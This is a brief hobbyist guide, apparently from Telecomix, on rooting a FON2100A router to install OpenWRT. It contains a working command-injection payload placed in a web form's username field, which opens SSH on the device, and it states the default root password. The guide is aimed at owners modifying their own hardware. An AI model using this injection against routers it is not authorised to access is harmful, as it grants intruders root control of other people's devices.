SvartFON
From Telecomix Crypto Munitions Bureau
On hacknight 2010 @ forsken TCMB performed experiments on hacking into a FON2100A router and replacing the native software with freedom (OpenWRT). The Interwebs provided inadequate information on the process of gaining initial access into the device thus we publish our findings here:
- Make sure that a ethernet cable is not connected.
- Use some pointy device to hold the reset button (on the bottom) for 15-20 seconds (17 seconds worked for me)
- Wait until a WPA protected wireless network named MyPlace appears.
- Connect to MyPlace using the S/N code written on the bottom of your device.
- Create a .html file on you harddrive containing:
<html>;
<body>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT && /etc/init.d/dropbear)" />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
- Open the .html file in your browser and click submit.
- Your FON router will complain but now ssh should work.
- ssh root@192.168.10.1 the password is: admin
- Now you can: mv /etc/init.d/dropbear /etc/init.d/S50dropbear
- And uncomment the two lines concerning ssh in /etc/firewall.user
- Comment the last row in /bin/thinclient that executes /tmp/.thinclient.sh to prevent firmware updates.
To install OpenWRT then follow the instructions on http://wiki.openwrt.org/toh/fon/fonera starting from Replace the Kernel to Disable Write Protection.
